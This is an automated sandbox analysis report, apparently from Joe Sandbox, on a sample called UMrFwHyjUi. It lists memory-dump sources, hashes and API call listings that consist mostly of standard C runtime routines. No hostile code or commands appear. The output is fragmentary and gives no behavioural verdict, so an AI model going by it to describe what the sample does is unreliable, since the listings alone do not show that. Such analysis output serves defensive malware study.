                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 54951025-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3471368781-0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                            • Instruction ID: dade98f2e3b7d79b7e9def0f54beb32ed7572f6e05bbbfe360aac6c7cce0e09e
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4B14D73D4F9F3068B36856E445822FEEA26E91B4132BC3B9DDD03F189C726AD0695D0
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                                                                                                                                            • Instruction ID: 43cdf4ecb647160fda175e5076d83385583e07dd488e496ff266cef725db0fb4
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9f96b6833605b0715f9484dbe982297a654c379e9a96f2571680b3f7b5e8fa17
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7ED092B1509719AFDB288F5AE480896FBE8EE48274750C42EE8AE97700C231A8408B90
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                            • Instruction ID: d256f1c99479b207678580fcb63197705f640815169115519c5f26934de16b0c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8d911352b7be11e8ef3f8d43dc69cd37138e10f06c97852b63a715cd4b250d5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1AE06C78A61648EFC740CF48C185E49B3F8FB09768F118095E905DB321C378EE00EB50
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 5235bc6f45b747b251e4dee57095da2f280f55043986cdd14d68c6e044f9f23d
                                                                                                                                                                                                                            • Instruction ID: 393c624c63770748ced812bc2f6ebea4908816b08aedbaaa32699303a7a81189
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5235bc6f45b747b251e4dee57095da2f280f55043986cdd14d68c6e044f9f23d
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37C0803C10074846CD15451082753643355A7937C1F40148CD46607641C72D5D45D611
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                            • Instruction ID: 6edc1f77bc014f77afb1dd4525fcd7db61d9a3eb149a076bd6fc7a55924a73f3
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f1937a1b08348a57b00ab59f39d03f042d4a1f0e171b8ae631e82396fa0be247
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D9C08C72529208EFD70DCB84D613F5AB3FCE704758F10409CE00293780C67DAB00CA58
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                            • Instruction ID: 5941d710df6caaa93d6ffa2de60dce8e613dec4f923ccdd24a2439a3e016513d
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17de449bc8e75433a69f048acdc393cdc02c9d7c97a966a586413745d476a19c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DAA002315569D48ECE53D7158260F207BB8A741A41F0504D1E491C6863C11CDA50D950

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • operator+.LIBCMT ref: 001E4621
                                                                                                                                                                                                                              • Part of subcall function 001E1730: DName::DName.LIBCMT ref: 001E1743
                                                                                                                                                                                                                              • Part of subcall function 001E1730: DName::operator+.LIBCMT ref: 001E174A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: NameName::Name::operator+operator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2937105810-0
                                                                                                                                                                                                                            • Opcode ID: 35539629968e138beffd51becdf4c8dee185b9484c6757ffb25b44c6f192daa8
                                                                                                                                                                                                                            • Instruction ID: 2ffb584c078573f3cf482021f615a69eb462783f07da878c5a2a4865f205b048
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35539629968e138beffd51becdf4c8dee185b9484c6757ffb25b44c6f192daa8
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAD13C75D00689AFDB14DFA9C895EEEBBF4BF18300F14406AF501EB292DB349A85CB51

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+=$Decorator::getNameName::Name::operator+Name::operator=Type$Dataoperator+
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1129569759-0
                                                                                                                                                                                                                            • Opcode ID: 6dbec500bb396f51e2aa04729c82308d503cf4e8d877ee9f6af5757cd44cb17a
                                                                                                                                                                                                                            • Instruction ID: a0b3a753a1149f2a66717f6a37cac6fff8030dc19a9866f73912a3c4b437873a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6dbec500bb396f51e2aa04729c82308d503cf4e8d877ee9f6af5757cd44cb17a
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5491C171A00EC9AFCF28DF9AC885ABD7B77AF1931AF644156F412D7292D7348B408B11

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2193103758-0
                                                                                                                                                                                                                            • Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                                                                                                                                                                                            • Instruction ID: dc3d92cb45e36b7ba6639651f1d3a7185eea4fd4fe376d6605b963e6fffb064f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 05210535104E80AFDB267F27D81291FBBE5EFB1B50B60842EF48957252DF32AC808752

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 599 1992cd-199311 GetModuleHandleW GetProcAddress * 3
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 001992D3
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetCurrentPackageId), ref: 001992E1
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 001992F2
                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00199303
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                            • String ID: GetCurrentPackageId$GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                            • API String ID: 667068680-1247241052
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 0-3907804496
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnDecorator::getArgumentList.LIBCMT ref: 001E1A17
                                                                                                                                                                                                                              • Part of subcall function 001E15B2: Replicator::operator[].LIBCMT ref: 001E1635
                                                                                                                                                                                                                              • Part of subcall function 001E15B2: DName::operator+=.LIBCMT ref: 001E163D
                                                                                                                                                                                                                            • DName::operator+.LIBCMT ref: 001E1A70
                                                                                                                                                                                                                            • DName::DName.LIBCMT ref: 001E1AC8
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
                                                                                                                                                                                                                            • String ID: (;C$4;C$8;C$D;C
                                                                                                                                                                                                                            • API String ID: 834187326-2621726175
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0019912C
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199158
                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 00199197
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 001991B4
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 001991F3
                                                                                                                                                                                                                            • __alloca_probe_16.LIBCMT ref: 00199210
                                                                                                                                                                                                                            • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00199252
                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00199275
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 2040435927-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 0019CF21
                                                                                                                                                                                                                            • ___TypeMatch.LIBVCRUNTIME ref: 0019D02F
                                                                                                                                                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 0019D19C
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CallMatchTypeUnexpectedtype_info::operator==
                                                                                                                                                                                                                            • String ID: csm$csm$csm
                                                                                                                                                                                                                            • API String ID: 1206542248-393685449
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C907
                                                                                                                                                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0019C90F
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019C998
                                                                                                                                                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0019C9C3
                                                                                                                                                                                                                            • _ValidateLocalCookies.LIBCMT ref: 0019CA18
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                            • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                            • Opcode ID: 4fdd39745adb7345a6936d400da34406e941e9a737caad057a4d27695deafba5
                                                                                                                                                                                                                            • Instruction ID: 350d9619ba4047d08ebbcbcddd1c67275e8776923b73e5cb780caae0e0238b17
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4fdd39745adb7345a6936d400da34406e941e9a737caad057a4d27695deafba5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D241A434A00209AFCF10DF68C885AAEBBB5AF55318F148195F859AB392D731EE51CFD1
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,F8250000,?,AB531964,?,001A72FC,0019EE66,?,F8250000,00000000), ref: 001A72B0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                            • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                            • API String ID: 3664257935-537541572
                                                                                                                                                                                                                            • Opcode ID: 6db3bffc711ff31d10cd8e744e83122d91acb3c1a88f3c379213269c2c92a556
                                                                                                                                                                                                                            • Instruction ID: 30308bfda471d636d0964868880c149e0b7bde2d9bb3bc1202b360bc8f4fdf5c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6db3bffc711ff31d10cd8e744e83122d91acb3c1a88f3c379213269c2c92a556
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F4213A3AA45210A7CB32AB61EC54B9A3768AF53360F290216F915E72D0D730EF01C6E0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • UnDecorator::UScore.LIBCMT ref: 001E3395
                                                                                                                                                                                                                            • DName::DName.LIBCMT ref: 001E33A1
                                                                                                                                                                                                                              • Part of subcall function 001E106C: DName::doPchar.LIBCMT ref: 001E109D
                                                                                                                                                                                                                            • UnDecorator::getScopedName.LIBCMT ref: 001E33E0
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E33EA
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E33F9
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E3405
                                                                                                                                                                                                                            • DName::operator+=.LIBCMT ref: 001E3412
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974817710.00000000001C2000.00000004.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974799588.00000000001B6000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974861913.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974880869.0000000000223000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974896688.0000000000225000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974913124.0000000000229000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_190000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1480779885-0
                                                                                                                                                                                                                            • Opcode ID: 7491704a406c1c578bfc7b1f4575f9842b7a48a94faccf0b99b655ecd725c168
                                                                                                                                                                                                                            • Instruction ID: 78191f4e9ebe49e095d43c982263041613ec26dfa0cd5f1a8dd7009bf3e8f01f
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7491704a406c1c578bfc7b1f4575f9842b7a48a94faccf0b99b655ecd725c168
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C11A371A00684AFD719EB25C85ABADBBA0EF20301F044095F0129B2D2CB70DB81CB41
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • __EH_prolog3.LIBCMT ref: 001973CC
                                                                                                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 001973D6
                                                                                                                                                                                                                            • int.LIBCPMT ref: 001973ED
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::_Lockit.LIBCPMT ref: 00191841
                                                                                                                                                                                                                              • Part of subcall function 00191830: std::_Lockit::~_Lockit.LIBCPMT ref: 0019185B
                                                                                                                                                                                                                            • codecvt.LIBCPMT ref: 00197410
                                                                                                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00197427
                                                                                                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00197447
                                                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 00197454
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000000.00000002.1974772699.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000000.00000002.1974753956.0000000000190000.00000002.00000001.01000000.00000003.sdmp
